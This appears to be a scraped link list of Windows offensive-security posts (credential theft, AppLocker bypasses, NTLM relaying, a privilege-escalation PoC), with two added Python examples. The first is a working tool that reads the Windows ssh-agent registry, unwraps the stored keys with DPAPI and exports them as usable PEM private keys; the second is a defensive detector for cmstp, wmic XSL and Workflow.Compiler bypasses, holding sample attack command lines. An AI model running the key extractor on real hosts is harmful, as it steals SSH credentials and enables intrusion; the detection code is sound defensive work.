Extracting SSH Private Keys from Windows 10 ssh-agent
https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent
@WindowsHackingLibrary
ropnop blog
Extracting SSH Private Keys From Windows 10 ssh-agent
The newest Windows 10 update includes OpenSSH utilities, including ssh-agent. Here’s how to extract unencrypted saved private keys from the registry
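Added example, not the ropnop post's own script: a parser for the RSA key blob the Windows ssh-agent persists, plus the Windows-only retrieval step. Two things are assumptions rather than facts from this page: that the keys sit under HKCU\Software\OpenSSH\Agent\Keys, one subkey per key with the DPAPI-wrapped blob in the subkey's default value, and that the unwrapped blob uses the ssh-agent "add identity" wire layout for RSA (string "ssh-rsa", then mpints n, e, d, iqmp, p, q, then a comment string). The sample blob is constructed from a toy RSA key so the parser and PEM export run offline.

```python
"""Parse the RSA private-key blob a Windows ssh-agent keeps in the registry.
Assumed (not from the page): HKCU\\Software\\OpenSSH\\Agent\\Keys\\<id> default
value = DPAPI-wrapped blob; unwrapped blob = ssh-agent add-identity layout:
string "ssh-rsa", mpint n, e, d, iqmp, p, q, string comment.
Only read_agent_keys_from_registry()/dpapi_unprotect() need Windows."""
import base64
import struct


def encode_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def encode_mpint(x: int) -> bytes:
    """SSH mpint: big-endian two's complement, leading 0x00 when the high bit is set."""
    if x == 0:
        return struct.pack(">I", 0)
    return encode_string(x.to_bytes((x.bit_length() + 8) // 8, "big"))


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def _read_mpint(buf: bytes, off: int):
    raw, off = _read_string(buf, off)
    return int.from_bytes(raw, "big", signed=True), off


def parse_agent_rsa_blob(blob: bytes) -> dict:
    """Split an unwrapped agent blob into RSA components and sanity-check p*q == n."""
    keytype, off = _read_string(blob, 0)
    if keytype != b"ssh-rsa":
        raise ValueError("not an RSA agent blob: %r" % keytype)
    key = {}
    for name in ("n", "e", "d", "iqmp", "p", "q"):
        key[name], off = _read_mpint(blob, off)
    comment, off = _read_string(blob, off) if off < len(blob) else (b"", off)
    key["comment"] = comment.decode("utf-8", "replace")
    if key["p"] * key["q"] != key["n"]:
        raise ValueError("p*q != n: blob is not a consistent RSA key")
    return key


def _der_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b


def _der_int(x: int) -> bytes:
    raw = x.to_bytes(max(1, (x.bit_length() + 8) // 8), "big")  # minimal two's complement
    return b"\x02" + _der_len(len(raw)) + raw


def rsa_to_pem(key: dict) -> str:
    """PKCS#1 RSAPrivateKey DER (version, n, e, d, p, q, dP, dQ, qInv) as PEM, usable by ssh/openssl."""
    p, q, d = key["p"], key["q"], key["d"]
    fields = (0, key["n"], key["e"], d, p, q, d % (p - 1), d % (q - 1), key["iqmp"])
    body = b"".join(_der_int(v) for v in fields)
    b64 = base64.b64encode(b"\x30" + _der_len(len(body)) + body).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN RSA PRIVATE KEY-----\n" + "\n".join(lines) + "\n-----END RSA PRIVATE KEY-----\n"


def dpapi_unprotect(data: bytes) -> bytes:
    """CryptUnprotectData with the current user's DPAPI master key (Windows only)."""
    import ctypes
    from ctypes import wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", wintypes.DWORD), ("pbData", ctypes.POINTER(ctypes.c_char))]

    buf = ctypes.create_string_buffer(data, len(data))
    inp = DATA_BLOB(len(data), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char)))
    out = DATA_BLOB()
    if not ctypes.windll.crypt32.CryptUnprotectData(ctypes.byref(inp), None, None, None, None, 0, ctypes.byref(out)):
        raise ctypes.WinError()
    try:
        return ctypes.string_at(out.pbData, out.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(out.pbData)


def read_agent_keys_from_registry():
    """Windows only: yield (subkey name, unwrapped blob) for every key the agent saved (assumed layout)."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\OpenSSH\Agent\Keys") as root:
        i = 0
        while True:
            try:
                name = winreg.EnumKey(root, i)
            except OSError:
                return
            i += 1
            with winreg.OpenKey(root, name) as sub:
                wrapped, _ = winreg.QueryValueEx(sub, "")  # assumed: default value holds the DPAPI blob
            yield name, dpapi_unprotect(wrapped)


# Constructed toy key (p=61, q=53, e=17, d=2753) so everything above runs offline; real keys are 2048+ bits.
_P, _Q, _E, _D = 61, 53, 17, 2753
SAMPLE_BLOB = (encode_string(b"ssh-rsa") + encode_mpint(_P * _Q) + encode_mpint(_E) + encode_mpint(_D)
               + encode_mpint(pow(_Q, -1, _P)) + encode_mpint(_P) + encode_mpint(_Q) + encode_string(b"lab@host"))

if __name__ == "__main__":
    key = parse_agent_rsa_blob(SAMPLE_BLOB)
    print(key["comment"], key["n"].bit_length(), "bit")
    print(rsa_to_pem(key))
```

On a real host the loop is `for name, blob in read_agent_keys_from_registry(): print(rsa_to_pem(parse_agent_rsa_blob(blob)))`, run as the user who owns the agent; DPAPI unwrapping silently fails (or needs the user's master key) under any other account, which is the one protection the design gives these keys.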
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)
https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
@WindowsHackingLibrary
Medium
Yes it’s still easy to get Domain Admin “before lunch” as it was when I first started.
CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service
https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
@WindowsHackingLibrary
Atredis Partners
CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service — Atredis Partners
In this write-up, Ryan Hanson describes his process for identifying and exploiting CVE-2018-0952, an arbitrary file creation vulnerability in the Windows Diagnostics Hub Standard Collector service, allowing for elevation of privileges.
Operational Guidance for Offensive User DPAPI Abuse
https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
@WindowsHackingLibrary
Medium
I’ve spoken about DPAPI (the Data Protection Application Programming Interface) a bit before, including how KeePass uses DPAPI for its “Windows User Account” key option. I recently dove into some of…
Kerberoasting and SharpRoast output parsing!
https://grumpy-sec.blogspot.com/2018/08/kerberoasting-and-sharproast-output.html
@WindowsHackingLibrary
Blogspot
Hey everyone, so harmj0y released a bunch of cool C# tools about a month ago here: https://www.harmj0y.net/blog/redteaming/ghostpack/ . ...
whitelist_bypass_server
This module is designed to be a platform to test an endpoint's application whitelisting effectiveness by providing bypasses to solutions such as software restriction policies and AppLocker.
https://github.com/rapid7/metasploit-framework/pull/8783
@WindowsHackingLibrary
GitHub
Add whitelist_bypass_server module by NickTyrer · Pull Request #8783 · rapid7/metasploit-framework
Intro
This module is designed to be a platform to test an endpoint's application whitelisting effectiveness by providing bypasses to solutions such as software restriction policies and AppLocker.
T...
Clientside Exploitation - Tricks of the Trade 0x01 - Sharpshooter + SquibblyTwo
https://0x00sec.org/t/clientside-exploitation-tricks-of-the-trade-0x01-sharpshooter-squibblytwo/8178
@WindowsHackingLibrary
0x00sec - The Home of the Hacker
Clientside Exploitation - Tricks of the Trade 0x01 - Sharpshooter + SquibblyTwo Hi! I hope you’re well, today I am going to show you something that is common knowledge in the red teaming community, people use this kind of thing every day without thinking…
Task Scheduler ALPC exploit (unpatched) && PoC by SandboxEscaper
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
@WindowsHackingLibrary
Remote NTLM relaying through meterpreter on Windows port 445
https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445
@WindowsHackingLibrary
DiabloHorn
The hijacking of port 445 to perform relay attacks or hash capturing attacks has been a recurring topic for a while now. When you infect a target with meterpreter, how do you listen on port 445? A …
Microsoft.Workflow.Compiler.exe, Veil, and Cobalt Strike
https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike
@WindowsHackingLibrary
Bypassing Workflows Protection Mechanisms - Remote Code Execution on SharePoint
https://www.nccgroup.trust/uk/our-research/technical-advisory-bypassing-workflows-protection-mechanisms-remote-code-execution-on-sharepoint
@WindowsHackingLibrary
Having Fun with ActiveX Controls in Microsoft Word
https://www.blackhillsinfosec.com/having-fun-with-activex-controls-in-microsoft-word
@WindowsHackingLibrary
Black Hills Information Security
Having Fun with ActiveX Controls in Microsoft Word - Black Hills Information Security
Marcello Salvati// During Red Team and penetration tests, it’s always important and valuable to test assumptions. One major assumption I hear from Pentesters, Red teamers and clients alike is that […]
Invoke-AtomicTest - Automating MITRE ATT&CK with Atomic Red Team
http://subt0x11.blogspot.com/2018/08/invoke-atomictest-automating-mitre-att.html
@WindowsHackingLibrary
AppLocker Bypass - CMSTP
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp
@WindowsHackingLibrary
Penetration Testing Lab
CMSTP is a binary which is associated with the Microsoft Connection Manager Profile Installer. It accepts INF files which can be weaponised with malicious commands in order to execute arbitrary cod…
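The CMSTP entry above, the Microsoft.Workflow.Compiler.exe entry and the SquibblyTwo (wmic.exe /format: with an attacker XSL) entry all describe signed Microsoft binaries being fed attacker input to get around AppLocker and software restriction policies. As an added example that is not part of any of the linked posts, here is the detection side: process-creation events in a Sysmon Event ID 1 shape, constructed for this example, run through three rules keyed on the binary name and command line. The cmstp.exe rule keys on the /ni /s switches the pentestlab post uses; the list of built-in wmic formats is from memory and should be checked against your own build.

```python
"""Flag process-creation events matching the whitelisting bypasses linked here:
cmstp.exe silently installing an .inf (/ni /s), wmic.exe /format: pointed at a
caller-supplied XSL (SquibblyTwo), and any Microsoft.Workflow.Compiler.exe run.
Added example; the events below are constructed in a Sysmon Event ID 1 shape."""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    image: str            # full path of the new process
    command_line: str
    parent_image: str


# Output formats wmic ships with (from memory; extend for your build). Anything else
# after /format: is an XSL the caller supplied, local or remote.
WMIC_BUILTIN_FORMATS = {"list", "csv", "xml", "htable", "hform", "mof", "rawxml",
                        "table", "texttablewsys", "value"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def cmstp_silent_inf(cmd: str) -> bool:
    """cmstp.exe given an .inf together with /s (silent) or /ni (no network interface)."""
    return bool(re.search(r"\.inf\b", cmd, re.I)) and bool(re.search(r"(^|\s)/(s|ni)\b", cmd, re.I))


def wmic_custom_xsl(cmd: str) -> bool:
    """wmic.exe /format: whose value is not a built-in format name."""
    m = re.search(r'/format:\s*"?([^"\s]+)', cmd, re.I)
    return m is not None and m.group(1).lower() not in WMIC_BUILTIN_FORMATS


def any_invocation(cmd: str) -> bool:
    """Microsoft.Workflow.Compiler.exe compiles and runs the XOML/C# it is handed and has
    no routine use on a workstation, so every launch is worth a look."""
    return True


RULES: List[Tuple[str, str, Callable[[str], bool]]] = [
    ("cmstp_silent_inf_install", "cmstp.exe", cmstp_silent_inf),
    ("wmic_custom_xsl_format", "wmic.exe", wmic_custom_xsl),
    ("workflow_compiler_launch", "microsoft.workflow.compiler.exe", any_invocation),
]


def detect(events: List[ProcessEvent]) -> List[Tuple[str, ProcessEvent]]:
    """Return (rule name, event) for every event a rule matches, in input order."""
    hits = []
    for ev in events:
        image = basename(ev.image)
        for name, binary, pred in RULES:
            if image == binary and pred(ev.command_line):
                hits.append((name, ev))
    return hits


# Constructed sample: three bypass attempts, one benign wmic query, one benign cmstp run.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\cmstp.exe",
                 r"cmstp.exe /ni /s C:\Users\lab\AppData\Local\Temp\profile.inf",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe",
                 r'wmic os get /format:"https://files.example.test/report.xsl"',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe",
                 "wmic os get caption /format:list",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe",
                 r"Microsoft.Workflow.Compiler.exe C:\Users\lab\build.txt C:\Users\lab\out.txt",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent(r"C:\Windows\System32\cmstp.exe",
                 r'cmstp.exe "C:\Program Files\CorpVPN\corpvpn.inf"',
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for rule, ev in detect(SAMPLE_EVENTS):
        print(f"{rule}: {ev.command_line}  (parent {basename(ev.parent_image)})")
```

The benign Connection Manager install (no /ni /s, launched from explorer.exe) is deliberately left unflagged; in a real pipeline the parent process and the INF's location (user-writable temp vs. a deployment share) are the next fields to pivot on, and all three rules are only as good as your visibility into command lines, which AppLocker's own audit log does not give you.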
Red Teaming Microsoft: Part 1 – Active Directory Leaks via Azure
https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure
@WindowsHackingLibrary
Black Hills Information Security, Inc.
Red Teaming Microsoft: Part 1 - Active Directory Leaks via Azure - Black Hills Information Security, Inc.
Mike Felch // With so many Microsoft technologies, services, integrations, applications, and configurations it can create a great deal of difficulty just to manage everything. Now imagine trying to secure […]
Walk-through Mimikatz sekurlsa module
https://jetsecurity.github.io/post/mimikatz/walk-through_sekurlsa
@WindowsHackingLibrary
windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems
https://github.com/pentestmonkey/windows-privesc-check
@FromZer0toHero
GitHub
GitHub - pentestmonkey/windows-privesc-check: Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows…
Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems - pentestmonkey/windows-privesc-check
Understanding how DLL Hijacking works
https://astr0baby.wordpress.com/2018/09/08/understanding-how-dll-hijacking-works
@WindowsHackingLibrary
Astr0baby's not so random thoughts _____ rand() % 100;
It is vital to understand how these vulnerabilities in fact work (DLL Hijacking from valid Windows PE32 executables) So we will prepare a real world scenario and will use an outdated piece of softw…
Playing with Relayed Credentials
https://www.coresecurity.com/blog/playing-relayed-credentials
@WindowsHackingLibrary
Coresecurity
Advanced Pen-Testing Tricks: Building a Lure to Collect High Value Credentials
Here’s the scenario: You’ve compromised a system but it hasn’t been logged into recently by an administrator, so you’re quite disappointed by your Mimikatz results. You’ve got local system credentials but nothing that’s on the domain except the machine account.…
DDE Downloaders, Excel Abuse, and a PowerShell Backdoor
http://rinseandrepeatanalysis.blogspot.com/2018/09/dde-downloaders-excel-abuse-and.html
@WindowsHackingLibrary
Blogspot
DDE or Dynamic Data Exchange is a Microsoft protocol used to transmit data/messages between applications. This sounds harmless and useful, b...